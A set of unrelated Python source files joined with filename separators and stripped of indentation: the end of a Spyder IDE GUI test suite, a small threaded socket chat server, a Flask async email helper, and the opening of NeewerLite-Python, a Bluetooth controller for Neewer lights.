cursor.movePosition(QTextCursor.End, QTextCursor.MoveAnchor)
cursor.movePosition(QTextCursor.PreviousBlock, QTextCursor.KeepAnchor)
code_editor.setTextCursor(cursor)
# Select the run selection button to click it
run_selection_action = main_window.run_toolbar_actions[3]
run_selection_button = main_window.run_toolbar.widgetForAction(
run_selection_action)
# Make sure we don't switch to the console after pressing the button
if focus_to_editor:
with qtbot.assertNotEmitted(
main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
):
qtbot.mouseClick(run_selection_button, Qt.LeftButton)
else:
qtbot.mouseClick(run_selection_button, Qt.LeftButton)
qtbot.wait(1000)
# Check the right widget has focus
focus_widget = QApplication.focusWidget()
if focus_to_editor:
assert focus_widget is code_editor
else:
assert focus_widget is control
@pytest.mark.slow
@flaky(max_runs=3)
def test_focus_to_consoles(main_window, qtbot):
"""
Check that we give focus to the text widget of our consoles after focus
is given to their dockwidgets.
"""
# Wait for the console to be up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Show internal console
console = main_window.get_plugin(Plugins.Console)
console.toggle_view_action.setChecked(True)
# Change to the IPython console and assert focus is given to its focus
# widget
main_window.ipyconsole.dockwidget.raise_()
focus_widget = QApplication.focusWidget()
assert focus_widget is control
# Change to the Internal console and assert focus is given to its focus
# widget
console.dockwidget.raise_()
focus_widget = QApplication.focusWidget()
assert focus_widget is console.get_widget().get_focus_widget()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Hangs sometimes on Windows")
def test_rename_files_in_editor_after_folder_rename(main_window, mocker,
tmpdir):
"""
Check that we rename files in the editor after the directory that
contains them was renamed in Files.
"""
old_path = 'test_rename_old'
new_path = 'test_rename_new'
fname = 'foo.py'
# Mock output of QInputDialog to set new path after rename
mocker.patch.object(QInputDialog, 'getText',
return_value=(new_path, True))
# Create temp folder and simple file on it
file = tmpdir.mkdir(old_path).join(fname)
file.write("print('Hello world!')")
# Load file in editor
editor = main_window.get_plugin(Plugins.Editor)
editor.load(str(file))
# Switch to temp dir and give focus to Files
explorer = main_window.get_plugin(Plugins.Explorer)
explorer.chdir(str(tmpdir))
explorer.switch_to_plugin()
explorer.get_widget().get_focus_widget().setFocus()
# Select directory in widget
treewidget = explorer.get_widget().treewidget
idx = treewidget.get_index(old_path)
treewidget.setCurrentIndex(idx)
# Rename directory
treewidget.rename()
# Check file was renamed in editor
codeeditor = editor.get_current_editor()
assert codeeditor.filename == osp.join(str(tmpdir), new_path, fname)
@pytest.mark.slow
@flaky(max_runs=3)
def test_history_from_ipyconsole(main_window, qtbot):
"""
Check that we register commands introduced in the IPython console in
the History pane.
"""
# Wait for the console to be up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Run some code in the console
code = '5 + 3'
with qtbot.waitSignal(shell.executed):
shell.execute(code)
# Check that code is displayed in History
history = main_window.get_plugin(Plugins.History)
history.switch_to_plugin()
history_editor = history.get_widget().editors[0]
text = history_editor.toPlainText()
assert text.splitlines()[-1] == code
@pytest.mark.slow
def test_debug_unsaved_function(main_window, qtbot):
"""
Test that a breakpoint in an unsaved file is reached.
"""
# Main variables
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text('def foo():\n print(1)')
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=2)
# run file
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
# debug foo
with qtbot.waitSignal(shell.executed):
shell.execute('%debug foo()')
with qtbot.waitSignal(shell.executed):
shell.execute('continue')
assert "1---> 2 print(1)" in control.toPlainText()
if __name__ == "__main__":
pytest.main()
|
servidor.py | import socket
import threading
import sys
import pickle
import os
class Servidor():
def __init__(self, host=socket.gethostname(), port=59989):
self.clientes = []
self.sock = socket.socket()
self.sock.bind((str(host), int(port)))
self.sock.listen(20)
self.sock.setblocking(False)
aceptar = threading.Thread(target=self.aceptarC)
procesar = threading.Thread(target=self.procesarC)
aceptar.daemon = True
aceptar.start()
procesar.daemon = True
procesar.start()
while True:
msg = input('SALIR = Q\n')
if msg == 'Q':
print("**** TALOGOOO *****")
self.sock.close()
sys.exit()
else:
pass
def broadcast(self, msg, cliente):
for c in self.clientes:
try:
if c != cliente:
c.send(msg)
except:
self.clientes.remove(c)
def aceptarC(self):
while True:
try:
conn, addr = self.sock.accept()
print(f"\nConexion aceptada via {conn}\n")
conn.setblocking(False)
self.clientes.append(conn)
except:
pass
def procesarC(self):
print("Procesamiento de mensajes iniciado")
while True:
if len(self.clientes) > 0:
for c in self.clientes:
try:
data = c.recv(32)
if data:
self.broadcast(data,c)
except:
pass
s = Servidor() |
email.py | from flask_mail import Message
from flask import render_template, current_app
from decouple import config
from . import mail
from time import sleep
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
# block only for testing parallel thread
for i in range(10, -1, -1):
sleep(2)
print('time:', i)
print('====> sending async')
mail.send(msg)
def mail_message(subject,template,to,**kwargs):
app = current_app._get_current_object()
sender_email = config("MAIL_USERNAME", default="")
msg = Message(subject, sender=("Epic Blogs"), recipients=[to])
msg.html = render_template(template + ".html",**kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr |
NeewerLite-Python.py | #############################################################
## NeewerLite-Python
## by Zach Glenwright
#############################################################
## > https://github.com/taburineagle/NeewerLite-Python/ <
#############################################################
## A cross-platform Python script using the bleak and
## PySide2 libraries to control Neewer brand lights via
## Bluetooth on multiple platforms -
## Windows, Linux/Ubuntu, MacOS and RPi
#############################################################
## Based on the NeewerLight project by @keefo (Xu Lian)
## > https://github.com/keefo/NeewerLite <
#############################################################
import os
import sys
import argparse
import platform # used to determine which OS we're using for MAC address/GUID listing
import asyncio
import threading
import time
from datetime import datetime
# IMPORT BLEAK (this is the library that allows the program to communicate with the lights) - THIS IS NECESSARY!
try:
from bleak import BleakScanner, BleakClient
except ModuleNotFoundError as e:
print(" ===== CAN NOT FIND BLEAK LIBRARY =====")
print(" You need the bleak Python package installed to use NeewerLite-Python.")
print(" Bleak is the library that connects the program to Bluetooth devices.")
print(" Please install the Bleak package first before running NeewerLite-Python.")
print()
print(" To install Bleak, run either pip or pip3 from the command line:")
print(" pip install bleak")
print(" pip3 install bleak")
print()
print(" Or visit this website for more information:")
print(" https://pypi.org/project/bleak/")
sys.exit(1) # you can't use the program itself without Bleak, so kill the program if we don't have it
# IMPORT THE WINDOWS LIBRARY (if you don't do this, it will throw an exception on Windows only)
if platform.system() == "Windows": # try to load winrt if we're on Windows
try:
from winrt import _winrt
_winrt.uninit_apartment()
except Exception as e:
pass # if there is an exception to this module loading, you're not on Windows
importError = 0 # whether or not there's an issue loading PySide2 or the GUI file
# IMPORT PYSIDE2 (the GUI libraries)
try:
from PySide2.QtCore import Qt
from PySide2.QtGui import QLinearGradient, QColor, QKeySequence
from PySide2.QtWidgets import QApplication, QMainWindow, QTableWidgetItem, QShortcut
except Exception as e:
importError = 1 # log that we can't find PySide2
# IMPORT THE GUI ITSELF
try:
from ui_NeewerLightUI import Ui_MainWindow
except Exception as e:
if importError != 1: # if we don't already have a PySide2 issue
importError = 2 # log that we can't find the GUI file - which, if the program is downloaded correctly, shouldn't be an issue
# IMPORT THE HTTP SERVER
try:
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
except Exception as e:
pass # if there are any HTTP errors, don't do anything yet
CCTSlider = -1 # the current slider moved in the CCT window - 1 - Brightness / 2 - Hue / -1 - Both Brightness and Hue
sendValue = [] # an array to hold the values to be sent to the light
lastAnimButtonPressed = 1 # which animation button you clicked last - if none, then it defaults to 1 (the police sirens)
availableLights = [] # the list of Neewer lights currently available to control - format:
# 0 1 2 3 4 5 6 7
# [Bleak Scan Object, Bleak Connection, Custom Name, Last Params, Extend CCT Range, Send BRI/HUE independently, Light On/Off, Power/CH Data Returned]
threadAction = "" # the current action to take from the thread
setLightUUID = "69400002-B5A3-F393-E0A9-E50E24DCCA99" # the UUID to send information to the light
notifyLightUUID = "69400003-B5A3-F393-E0A9-E50E24DCCA99" # the UUID for notify callbacks from the light
maxNumOfAttempts = 6 # the maximum attempts CLI mode will attempt before quitting out
# FOR TESTING PURPOSES / FIRST-LAUNCH PREFERENCES
startup_findLights = True # whether or not to look for lights when the program starts
startup_connectLights = True # whether or not to auto-connect to lights after finding them
printDebug = True # show debug messages in the console for all of the program's events
receivedData = "" # the data received from the Notify characteristic
try: # try to load the GUI
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.setupUi(self) # set up the main UI
self.connectMe() # connect the function handlers to the widgets
if startup_findLights == True: # if we're set up to find lights on startup, then indicate that
self.statusBar.showMessage("Please wait - searching for Neewer lights...")
else:
self.statusBar.showMessage("Welcome to NeewerLite-Python! Hit the Scan button above to scan for lights.")
if platform.system() == "Darwin": # if we're on MacOS, then change the column text for the 2nd column in the light table
self.lightTable.horizontalHeaderItem(1).setText("Light UUID")
self.show
def connectMe(self):
self.scanCommandButton.clicked.connect(self.startSelfSearch)
self.tryConnectButton.clicked.connect(self.startConnect)
self.ColorModeTabWidget.currentChanged.connect(self.tabChanged)
self.lightTable.itemSelectionChanged.connect(self.selectionChanged)
self.Slider_CCT_Hue.valueChanged.connect(lambda: self.computeValueCCT(2))
self.Slider_CCT_Bright.valueChanged.connect(lambda: self.computeValueCCT(1))
self.Slider_HSI_1_H.valueChanged.connect(self.computeValueHSI)
self.Slider_HSI_2_S.valueChanged.connect(self.computeValueHSI)
self.Slider_HSI_3_L.valueChanged.connect(self.computeValueHSI)
self.Slider_ANM_Brightness.valueChanged.connect(lambda: self.computeValueANM(0))
self.Button_1_police_A.clicked.connect(lambda: self.computeValueANM(1))
self.Button_1_police_B.clicked.connect(lambda: self.computeValueANM(2))
self.Button_1_police_C.clicked.connect(lambda: self.computeValueANM(3))
self.Button_2_party_A.clicked.connect(lambda: self.computeValueANM(4))
self.Button_2_party_B.clicked.connect(lambda: self.computeValueANM(5))
self.Button_2_party_C.clicked.connect(lambda: self.computeValueANM(6))
self.Button_3_lightning_A.clicked.connect(lambda: self.computeValueANM(7))
self.Button_3_lightning_B.clicked.connect(lambda: self.computeValueANM(8))
self.Button_3_lightning_C.clicked.connect(lambda: self.computeValueANM(9))
self.turnOffButton.clicked.connect(self.turnLightOff)
self.turnOnButton.clicked.connect(self.turnLightOn)
self.savePrefsButton.clicked.connect(self.savePrefs)
# SHORTCUT KEYS
self.SC_turnOffButton = QShortcut(QKeySequence("Ctrl+PgDown"), self)
self.SC_turnOffButton.activated.connect(self.turnLightOff)
self.SC_turnOnButton = QShortcut(QKeySequence("Ctrl+PgUp"), self)
self.SC_turnOnButton.activated.connect(self.turnLightOn)
self.SC_scanCommandButton = QShortcut(QKeySequence("Ctrl+Shift+S"), self)
self.SC_scanCommandButton.activated.connect(self.startSelfSearch)
self.SC_tryConnectButton = QShortcut(QKeySequence("Ctrl+Shift+C"), self)
self.SC_tryConnectButton.activated.connect(self.startConnect)
self.SC_Tab_CCT = QShortcut(QKeySequence("Alt+1"), self)
self.SC_Tab_CCT.activated.connect(lambda: self.switchToTab(0))
self.SC_Tab_HSI = QShortcut(QKeySequence("Alt+2"), self)
self.SC_Tab_HSI.activated.connect(lambda: self.switchToTab(1))
self.SC_Tab_SCENE = QShortcut(QKeySequence("Alt+3"), self)
self.SC_Tab_SCENE.activated.connect(lambda: self.switchToTab(2))
self.SC_Tab_PREFS = QShortcut(QKeySequence("Alt+4"), self)
self.SC_Tab_PREFS.activated.connect(lambda: self.switchToTab(3))
# DECREASE/INCREASE BRIGHTNESS REGARDLESS OF WHICH TAB WE'RE ON
self.SC_Dec_Bri_Small = QShortcut(QKeySequence("/"), self)
self.SC_Dec_Bri_Small.activated.connect(lambda: self.changeSliderValue(0, -1))
self.SC_Inc_Bri_Small = QShortcut(QKeySequence("*"), self)
self.SC_Inc_Bri_Small.activated.connect(lambda: self.changeSliderValue(0, 1))
self.SC_Dec_Bri_Large = QShortcut(QKeySequence("Ctrl+/"), self)
self.SC_Dec_Bri_Large.activated.connect(lambda: self.changeSliderValue(0, -5))
self.SC_Inc_Bri_Large = QShortcut(QKeySequence("Ctrl+*"), self)
self.SC_Inc_Bri_Large.activated.connect(lambda: self.changeSliderValue(0, 5))
# ADJUST THE SLIDERS ON THE CURRENT TAB (OR IF WE'RE ON SCENE MODE, CHANGE THE SCENE)
self.SC_Num1 = QShortcut(QKeySequence("1"), self)
self.SC_Num1.activated.connect(lambda: self.numberShortcuts(1))
self.SC_Num2 = QShortcut(QKeySequence("2"), self)
self.SC_Num2.activated.connect(lambda: self.numberShortcuts(2))
self.SC_Num3 = QShortcut(QKeySequence("3"), self)
self.SC_Num3.activated.connect(lambda: self.numberShortcuts(3))
self.SC_Num4 = QShortcut(QKeySequence("4"), self)
self.SC_Num4.activated.connect(lambda: self.numberShortcuts(4))
self.SC_Num5 = QShortcut(QKeySequence("5"), self)
self.SC_Num5.activated.connect(lambda: self.numberShortcuts(5))
self.SC_Num6 = QShortcut(QKeySequence("6"), self)
self.SC_Num6.activated.connect(lambda: self.numberShortcuts(6))
self.SC_Num7 = QShortcut(QKeySequence("7"), self)
self.SC_Num7.activated.connect(lambda: self.numberShortcuts(7))
self.SC_Num8 = QShortcut(QKeySequence("8"), self)
self.SC_Num8.activated.connect(lambda: self.numberShortcuts(8))
self.SC_Num9 = QShortcut(QKeySequence("9"), self)
self.SC_Num9.activated.connect(lambda: self.numberShortcuts(9))
# THE CTRL+NUM SHORTCUTS ARE ONLY FOR SLIDERS, SO WE DON'T NEED A CUSTOM FUNCTION
self.SC_Dec_1_Large = QShortcut(QKeySequence("Ctrl+7"), self)
self.SC_Dec_1_Large.activated.connect(lambda: self.changeSliderValue(1, -5))
self.SC_Inc_1_Large = QShortcut(QKeySequence("Ctrl+9"), self)
self.SC_Inc_1_Large.activated.connect(lambda: self.changeSliderValue(1, 5))
self.SC_Dec_2_Large = QShortcut(QKeySequence("Ctrl+4"), self)
self.SC_Dec_2_Large.activated.connect(lambda: self.changeSliderValue(2, -5))
self.SC_Inc_2_Large = QShortcut(QKeySequence("Ctrl+6"), self)
self.SC_Inc_2_Large.activated.connect(lambda: self.changeSliderValue(2, 5))
self.SC_Dec_3_Large = QShortcut(QKeySequence("Ctrl+1"), self)
self.SC_Dec_3_Large.activated.connect(lambda: self.changeSliderValue(3, -5))
self.SC_Inc_3_Large = QShortcut(QKeySequence("Ctrl+3"), self)
self.SC_Inc_3_Large.activated.connect(lambda: self.changeSliderValue(3, 5))
def switchToTab(self, theTab):
if self.ColorModeTabWidget.isTabEnabled(theTab) == True:
self.ColorModeTabWidget.setCurrentIndex(theTab) # if the tab we're requesting is available, then switch to it
def numberShortcuts(self, theNumber):
# THE KEYS:
# 7 AND 9 ADJUST THE FIRST SLIDER ON A TAB
# 4 AND 6 ADJUST THE SECOND SLIDER ON A TAB
# 1 AND 3 ADJUST THE THIRD SLIDER ON A TAB
# UNLESS WE'RE IN SCENE MODE, THEN THEY JUST SWITCH THE SCENE
if theNumber == 1:
if self.ColorModeTabWidget.currentIndex() == 2: # if we're on the SCENE tab, then the number keys correspond to an animation
self.computeValueANM(1)
else: # if we're not, adjust the slider
self.changeSliderValue(3, -1) # decrement slider 3
elif theNumber == 2:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(2)
elif theNumber == 3:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(3)
else:
self.changeSliderValue(3, 1) # increment slider 3
elif theNumber == 4:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(4)
else:
self.changeSliderValue(2, -1) # decrement slider 2
elif theNumber == 5:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(5)
elif theNumber == 6:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(6)
else:
self.changeSliderValue(2, 1) # increment slider 2
elif theNumber == 7:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(7)
else:
self.changeSliderValue(1, -1) # decrement slider 1
elif theNumber == 8:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(8)
elif theNumber == 9:
if self.ColorModeTabWidget.currentIndex() == 2:
self.computeValueANM(9)
else:
self.changeSliderValue(1, 1) # increment slider 1
def changeSliderValue(self, sliderToChange, changeAmt):
# CCT mode only has 2 sliders, so don't do anything if you ask for the "3rd" set
if self.ColorModeTabWidget.currentIndex() == 0:
if sliderToChange == 1:
self.Slider_CCT_Hue.setValue(self.Slider_CCT_Hue.value() + changeAmt)
elif sliderToChange == 2 or sliderToChange == 0:
self.Slider_CCT_Bright.setValue(self.Slider_CCT_Bright.value() + changeAmt)
elif self.ColorModeTabWidget.currentIndex() == 1:
if sliderToChange == 1:
self.Slider_HSI_1_H.setValue(self.Slider_HSI_1_H.value() + changeAmt)
elif sliderToChange == 2:
self.Slider_HSI_2_S.setValue(self.Slider_HSI_2_S.value() + changeAmt)
elif sliderToChange == 3 or sliderToChange == 0:
self.Slider_HSI_3_L.setValue(self.Slider_HSI_3_L.value() + changeAmt)
elif self.ColorModeTabWidget.currentIndex() == 2:
if sliderToChange == 0:
self.Slider_ANM_Brightness.setValue(self.Slider_ANM_Brightness.value() + changeAmt)
def checkLightTab(self, selectedLight = -1):
if self.ColorModeTabWidget.currentIndex() == 0: # if we're on the CCT tab, do the check
if selectedLight == -1: # if we don't have a light selected
self.setupCCTBounds(56) # restore the bounds to their default of 56(00)K
else:
if availableLights[selectedLight][4] == True: # if we're supposed to be extending the range
if self.Slider_CCT_Hue.maximum() == 56: # if we're set to extend the range, but we're still set to 56(00)K, then change the range
self.setupCCTBounds(85)
else:
if self.Slider_CCT_Hue.maximum() == 85: # if we're set to NOT extend the range, but we're still set to 85(00)K, then reduce the range
self.setupCCTBounds(56)
elif self.ColorModeTabWidget.currentIndex() == 3: # if we're on the Preferences tab instead
if selectedLight != -1: # if there is a specific selected light
self.setupPrefsTab(selectedLight) # update the Prefs tab with the information for that selected light
def setupCCTBounds(self, gradientBounds):
self.Slider_CCT_Hue.setMaximum(gradientBounds) # set the max value of the color temperature slider to the new max bounds
gradient = QLinearGradient(0, 0, 532, 31)
# SET GRADIENT OF CCT SLIDER IN CHUNKS OF 5 VALUES BASED ON BOUNDARY
if gradientBounds == 56: # the color temperature boundary is 5600K
gradient.setColorAt(0.0, QColor(255, 187, 120, 255)) # 3200K
gradient.setColorAt(0.25, QColor(255, 204, 153, 255)) # 3800K
gradient.setColorAt(0.50, QColor(255, 217, 182, 255)) # 4400K
gradient.setColorAt(0.75, QColor(255, 228, 206, 255)) # 5000K
gradient.setColorAt(1.0, QColor(255, 238, 227, 255)) # 5600K
else: # the color temperature boundary is 8500K
gradient.setColorAt(0.0, QColor(255, 187, 120, 255)) # 3200K
gradient.setColorAt(0.25, QColor(255, 219, 186, 255)) # 4500K
gradient.setColorAt(0.50, QColor(255, 240, 233, 255)) # 5800K
gradient.setColorAt(0.75, QColor(243, 242, 255, 255)) # 7100K
gradient.setColorAt(1.0, QColor(220, 229, 255, 255)) # 8500K
self.CCT_Temp_Gradient_BG.scene().setBackgroundBrush(gradient) # change the gradient to fit the new boundary
def setupPrefsTab(self, selectedLight):
self.customNameTF.setText(availableLights[selectedLight][2]) # set the "custom name" field to the custom name of this light
# IF THE OPTION TO ALLOW WIDER COLOR TEMPERATURES IS ENABLED, THEN ENABLE THAT CHECKBOX
if availableLights[selectedLight][4] == True:
self.widerRangeCheck.setChecked(True)
else:
self.widerRangeCheck.setChecked(False)
# IF THE OPTION TO SEND ONLY CCT MODE IS ENABLED, THEN ENABLE THAT CHECKBOX
if availableLights[selectedLight][5] == True:
self.onlyCCTModeCheck.setChecked(True)
else:
self.onlyCCTModeCheck.setChecked(False)
# CHECK TO SEE WHETHER OR NOT TO ENABLE/DISABLE THE "Connect" BUTTON OR CHANGE THE PREFS TAB
def selectionChanged(self):
selectedRows = self.selectedLights() # get the list of currently selected lights
if len(selectedRows) > 0: # if we have a selection
self.tryConnectButton.setEnabled(True) # if we have light(s) selected in the table, then enable the "Connect" button
if len(selectedRows) == 1: # we have exactly one light selected
self.ColorModeTabWidget.setTabEnabled(3, True) # enable the "Preferences" tab for this light
# SWITCH THE TURN ON/OFF BUTTONS ON, AND CHANGE TEXT TO SINGLE BUTTON TEXT
self.turnOffButton.setText("Turn Light Off")
self.turnOffButton.setEnabled(True)
self.turnOnButton.setText("Turn Light On")
self.turnOnButton.setEnabled(True)
self.ColorModeTabWidget.setTabEnabled(0, True)
if availableLights[selectedRows[0]][5] == True: # if this light is CCT only, then disable the HSI and ANM tabs
self.ColorModeTabWidget.setTabEnabled(1, False) # disable the HSI mode tab
self.ColorModeTabWidget.setTabEnabled(2, False) # disable the ANM/SCENE tab
else: # we can use HSI and ANM/SCENE modes, so enable those tabs
self.ColorModeTabWidget.setTabEnabled(1, True) # enable the HSI mode tab
self.ColorModeTabWidget.setTabEnabled(2, True) # enable the ANM/SCENE tab
currentlySelectedRow = selectedRows[0] # get the row index of the 1 selected item
self.checkLightTab(currentlySelectedRow) # if we're on CCT, check to see if this light can use extended values + on Prefs, update Prefs
# RECALL LAST SENT SETTING FOR THIS PARTICULAR LIGHT, IF A SETTING EXISTS
if availableLights[currentlySelectedRow][3] != []: # if the last set parameters aren't empty
if availableLights[currentlySelectedRow][6] != False: # if the light is listed as being turned ON
sendValue = availableLights[currentlySelectedRow][3] # make the current "sendValue" the last set parameter so it doesn't re-send it on re-load
if sendValue[1] == 135: # the last parameter was a CCT mode change
self.setUpGUI(colorMode="CCT",
brightness=sendValue[3],
temp=sendValue[4])
elif sendValue[1] == 134: # the last parameter was a HSI mode change
self.setUpGUI(colorMode="HSI",
hue=sendValue[3] + (256 * sendValue[4]),
sat=sendValue[5],
brightness=sendValue[6])
elif sendValue[1] == 136: # the last parameter was a ANM/SCENE mode change
self.setUpGUI(colorMode="ANM",
brightness=sendValue[3],
scene=sendValue[4])
else:
self.ColorModeTabWidget.setCurrentIndex(0) # switch to the CCT tab if the light is off and there ARE prior parameters
else:
self.ColorModeTabWidget.setCurrentIndex(0) # switch to the CCT tab if there are no prior parameters
else: # we have multiple lights selected
# SWITCH THE TURN ON/OFF BUTTONS ON, AND CHANGE TEXT TO MULTIPLE LIGHTS TEXT
self.turnOffButton.setText("Turn Light(s) Off")
self.turnOffButton.setEnabled(True)
self.turnOnButton.setText("Turn Light(s) On")
self.turnOnButton.setEnabled(True)
self.ColorModeTabWidget.setTabEnabled(0, True)
self.ColorModeTabWidget.setTabEnabled(1, True) # enable the "HSI" mode tab
self.ColorModeTabWidget.setTabEnabled(2, True) # enable the "ANM/SCENE" mode tab
self.ColorModeTabWidget.setTabEnabled(3, False) # disable the "Preferences" tab, as we have multiple lights selected
else: # the selection has been cleared or there are no lights to select
currentTab = self.ColorModeTabWidget.currentIndex() # get the currently selected tab (so when we disable the tabs, we stick on the current one)
self.tryConnectButton.setEnabled(False) # if we have no lights selected, disable the Connect button
# SWITCH THE TURN ON/OFF BUTTONS OFF, AND CHANGE TEXT TO GENERIC TEXT
self.turnOffButton.setText("Turn Light(s) Off")
self.turnOffButton.setEnabled(False)
self.turnOnButton.setText("Turn Light(s) On")
self.turnOnButton.setEnabled(False)
self.ColorModeTabWidget.setTabEnabled(0, False)
self.ColorModeTabWidget.setTabEnabled(1, False) # enable the "HSI" mode tab
self.ColorModeTabWidget.setTabEnabled(2, False) # enable the "ANM/SCENE" mode tab
self.ColorModeTabWidget.setTabEnabled(3, False) # disable the "Preferences" tab, as we have no lights selected
if currentTab != 3:
self.ColorModeTabWidget.setCurrentIndex(currentTab) # disable the tabs, but don't switch the current one shown
else:
self.ColorModeTabWidget.setCurrentIndex(0) # if we're on Prefs, then switch to the CCT tab
self.checkLightTab() # check to see if we're on the CCT tab - if we are, then restore order
def savePrefs(self):
selectedRows = self.selectedLights() # get the list of currently selected lights
if len(selectedRows) == 1: # if we have 1 selected light - which should never be false, as we can't use Prefs with more than 1
availableLights[selectedRows[0]][2] = self.customNameTF.text() # set this light's custom name to the text box
availableLights[selectedRows[0]][4] = self.widerRangeCheck.isChecked() # if the "wider range" box is checked, then allow wider ranges
availableLights[selectedRows[0]][5] = self.onlyCCTModeCheck.isChecked() # if the option to send BRI and HUE separately is checked, then turn that on
# IF A CUSTOM NAME IS SET UP FOR THIS LIGHT, THEN CHANGE THE TABLE TO REFLECT THAT
if availableLights[selectedRows[0]][2] != "":
self.setTheTable([availableLights[selectedRows[0]][2] + " (" + availableLights[selectedRows[0]][0].name + ")" "\n [ʀssɪ: " + str(availableLights[selectedRows[0]][0].rssi) + " dBm]",
"", "", ""], selectedRows[0])
# CREATE THE light_prefs FOLDER IF IT DOESN'T EXIST
try:
os.mkdir(os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs")
except FileExistsError:
pass # the folder already exists, so we don't need to create it
# GET THE CUSTOM FILENAME FOR THIS FILE, NOTED FROM THE MAC ADDRESS OF THE CURRENT LIGHT
exportFileName = availableLights[selectedRows[0]][0].address.split(":") # take the colons out of the MAC address
exportFileName = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "".join(exportFileName)
# BUILD THE PREFERENCES STRING
exportString = availableLights[selectedRows[0]][2] + "|" # the custom name
exportString = exportString + str(availableLights[selectedRows[0]][4]) + "|" # whether or not to allow this light to have wider range
exportString = exportString + str(availableLights[selectedRows[0]][5]) # whether or not to allow only CCT mode for this light
# WRITE THE PREFERENCES FILE
with open(exportFileName, "w") as prefsFileToWrite:
prefsFileToWrite.write(exportString)
printDebugString("Exported preferences for this light to " + exportFileName)
# ADD A LIGHT TO THE TABLE VIEW
def setTheTable(self, infoArray, rowToChange = -1):
if rowToChange == -1:
currentRow = self.lightTable.rowCount()
self.lightTable.insertRow(currentRow) # if rowToChange is not specified, then we'll make a new row at the end
else:
currentRow = rowToChange # change data for the specified row
if infoArray[0] != "": # the name of the light
self.lightTable.setItem(currentRow, 0, QTableWidgetItem(infoArray[0]))
if infoArray[1] != "": # the MAC address of the light
self.lightTable.setItem(currentRow, 1, QTableWidgetItem(infoArray[1]))
if infoArray[2] != "": # the Linked status of the light
self.lightTable.setItem(currentRow, 2, QTableWidgetItem(infoArray[2]))
self.lightTable.item(currentRow, 2).setTextAlignment(Qt.AlignCenter) # align the light status info to be center-justified
if infoArray[3] != "": # the current status message of the light
self.lightTable.setItem(currentRow, 3, QTableWidgetItem(infoArray[3]))
self.lightTable.resizeRowsToContents()
def returnTableInfo(self, row, column):
return self.lightTable.item(row, column).text()
# CLEAR ALL LIGHTS FROM THE TABLE VIEW
def clearTheTable(self):
if self.lightTable.rowCount() != 0:
self.lightTable.clearContents()
self.lightTable.setRowCount(0)
# TELL THE BACKGROUND THREAD TO START LOOKING FOR LIGHTS
def startSelfSearch(self):
global threadAction
threadAction = "discover"
self.statusBar.showMessage("Please wait - searching for Neewer lights...")
# TELL THE BACKGROUND THREAD TO START CONNECTING TO LIGHTS
def startConnect(self):
global threadAction
threadAction = "connect"
# TELL THE BACKGROUND THREAD TO START SENDING TO THE LIGHTS
def startSend(self):
global threadAction
if threadAction == "":
threadAction = "send"
# IF YOU CLICK ON ONE OF THE TABS, THIS WILL SWITCH THE VIEW/SEND A NEW SIGNAL FROM THAT SPECIFIC TAB
def tabChanged(self, i):
currentSelection = self.selectedLights() # get the list of currently selected lights
if i == 0: # we clicked on the CCT tab
if len(currentSelection) > 0: # if we have something selected
if len(currentSelection) == 1: # if we have just one light selected
# CHECK THE CURRENT SELECTED LIGHT TO SEE IF IT CAN USE EXTENDED COLOR TEMPERATURES
self.checkLightTab(currentSelection[0]) # set up the current light's CCT bounds
if availableLights[currentSelection[0]][6] != False: # if the light that's selected is off, then don't update CCT value
self.computeValueCCT() # calculate the current CCT value
else: # if we have more than one light selected
self.checkLightTab() # reset the bounds to the normal values (5600K)
elif i == 1: # we clicked on the HSI tab
if len(currentSelection) == 1: # if we have only one thing selected
if availableLights[currentSelection[0]][6] != False: # if the light that's selected is off, then don't update HSI value
self.computeValueHSI() # calculate the current HSI value
elif i == 2: # we clicked on the ANM tab
pass # skip this, we don't want the animation automatically triggering when we go to this page - but keep it for readability
elif i == 3: # we clicked on the PREFS tab
if len(currentSelection) == 1: # this tab function ^^ should *ONLY* call if we have just one light selected, but just in *case*
self.setupPrefsTab(currentSelection[0])
# COMPUTE A BYTESTRING FOR THE CCT SECTION
def computeValueCCT(self, hueOrBrightness = -1):
global CCTSlider
# CCTSlider = -1 # force this value to -1 to send both hue and brightness at the same time on SNL-660
CCTSlider = hueOrBrightness # set the global CCT "current slider" to the slider you just... slid
self.TFV_CCT_Hue.setText(str(self.Slider_CCT_Hue.value()) + "00K")
calculateByteString(colorMode="CCT",\
temp=str(int(self.Slider_CCT_Hue.value())),\
brightness=str(int(self.Slider_CCT_Bright.value())))
self.statusBar.showMessage("Current value (CCT Mode): " + updateStatus())
self.startSend()
# COMPUTE A BYTESTRING FOR THE HSI SECTION
def computeValueHSI(self):
calculateByteString(colorMode="HSI",\
HSI_H=str(int(self.Slider_HSI_1_H.value())),\
HSI_S=str(int(self.Slider_HSI_2_S.value())),\
HSI_I=str(int(self.Slider_HSI_3_L.value())))
